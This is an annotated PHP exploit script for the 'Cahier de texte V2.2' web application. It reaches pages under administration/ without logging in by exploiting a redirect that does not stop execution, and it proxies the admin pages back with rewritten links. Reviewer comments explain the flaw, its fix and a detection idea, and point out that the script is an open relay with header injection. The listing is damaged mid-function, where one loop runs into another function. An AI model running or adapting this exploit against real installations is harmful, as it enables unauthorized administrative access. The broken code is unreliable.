'Administrateur') { header("Location: ../index.php");} ;} else { header("Location: ../index.php");}?> ... */
// NOTE(review): everything up to the closing comment marker above is the tail of a
// comment that begins outside this view. It quotes an access check that answers
// with header("Location: ...") and shows no exit/die after it in the visible part.
// If that is the whole check, the protected page keeps rendering after the
// redirect header is sent (execution after redirect, CWE-698). The fix on the
// application side is to terminate the request right after the redirect.
// Detection idea: responses for administration/ pages that carry a Location
// header together with a full HTML body, served to sessions with no admin login.

// Entry point: without a non-empty "host" parameter, print the banner and stop.
if(!isset($_GET['host']) || empty($_GET['host'])) headers();
// NOTE(review): $wanted is only assigned here when the parameter is absent; no
// visible line copies $_GET['wanted'] into it — confirm how it is populated.
if(!isset($_GET['wanted'])) $wanted = 'index.php';
// host, prox and path come straight from the query string with no validation.
// They later feed fsockopen() and the raw request line, so wherever this file is
// hosted it acts as an unauthenticated relay to arbitrary host:port pairs, and
// the fetched response is echoed back unescaped.
$host = $_GET['host'];
$prox = $_GET['prox'];
$path = $_GET['path'];
// Fetch the requested page under administration/ and print the rewritten response.
echo sockxp($host,$path,$prox,"administration/".$wanted);
exit(0);

// Prints the banner and terminates. The string literal spans a line break;
// any markup it once contained appears to have been lost in extraction.
function headers() {
    print(" Cahier de texte V2.2 Exploit
");
    exit(0);
}

// Sends one HTTP/1.1 request over a raw socket and returns the complete response
// (status line, headers and body) after passing it through html_replace().
//   $host   - value used in the request URL and the Host header
//   $path   - path prefix placed before $wanted on non-POST requests
//   $prox   - optional "host:port" to connect to instead of $host on port 80
//   $wanted - page to request; the caller prefixes it with "administration/"
// Redirects are not followed: whatever body the server sends along with a
// Location header is returned as-is.
function sockxp($host,$path,$prox,$wanted) {
    // Connect to the proxy when one is given, otherwise to $host on port 80.
    $hope = !empty($prox) ? $prox : $host.':80';
    // Split "host:port" into $hosta[1] and $hosta[2].
    preg_match("/^(\S*):([0-9]+){1,5}/",$hope,$hosta);
    $hosh = $hosta[1];
    $hosp = $hosta[2];
    $recv = '';
    // The outgoing request reuses the method of the request made to this script.
    $meth = $_SERVER['REQUEST_METHOD'];
    if(empty($hosh) || empty($hosp)) exit(1);
    if(!$sock = fsockopen($hosh,$hosp)) exit(1);
    // Absolute-form request target ("METHOD http://host...").
    $dat = $meth." http://".$host;
    // POST: the target is built from $wanted with "administration//" removed and
    // $path is not included; other methods use $path followed by $wanted.
    if($meth === "POST") $dat .= "/".str_replace("administration//","",$wanted);
    else $dat .= $path.$wanted;
    $dat .= " HTTP/1.1\r\n";
    // $host is interpolated into a header line without filtering CR/LF.
    $dat .= "Host: $host\r\n";
    $dat .= "Connection: Close\r\n";
    if($meth === "POST") {
        // get_postdata() is called here; its definition header is not visible in
        // this view (see the note at the end of html_replace()).
        $postdata = get_postdata();
        $dat .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $dat .= "Content-Length: ".strlen($postdata)."\r\n\r\n";
        $dat .= $postdata."\r\n\r\n";
    } else {
        $dat .= "\r\n";
    }
    fputs($sock,$dat);
    // Read until the server closes the connection ("Connection: Close" above).
    while(!feof($sock)) $recv .= fgets($sock);
    fclose($sock);
    return html_replace($recv);
}

// Rewrites form actions, links, relative "=\"..\"" references and MM_goToURL()
// targets in the fetched response so that they point back at this script
// ($iniv) or at an absolute URL on the target host.
function html_replace($htmlc) {
    global $host,$path,$prox;
    // Prefix that routes a rewritten link through this script again.
    $iniv = $_SERVER['PHP_SELF']."?host=$host&path=$path&prox=$prox&wanted=";
    $newc = str_replace("action=\"","action=\"$iniv",$htmlc);
    $newc = str_replace("=\"..","=\"http://${host}${path}administration/..",$newc);
    $newc = str_replace("a href=\"","a href=\"$iniv",$newc);
    $newc = str_replace("MM_goToURL('parent','","MM_goToURL('parent','$iniv",$newc);
    $newc = explode("\n",$newc);
    // NOTE(review): the listing is damaged from here on. The loop header is cut
    // off after "$i" and resumes in the middle of what looks like a
    // "foreach (... as $key => $value)" belonging to get_postdata(); the rest of
    // html_replace() and the start of get_postdata() are missing from this view.
    for($i=0;$i $value) {
        // Builds a "key=value&" string; neither key nor value is URL-encoded here.
        $postdata .= $key."=".$value."&";
    }
    return $postdata;
}
?>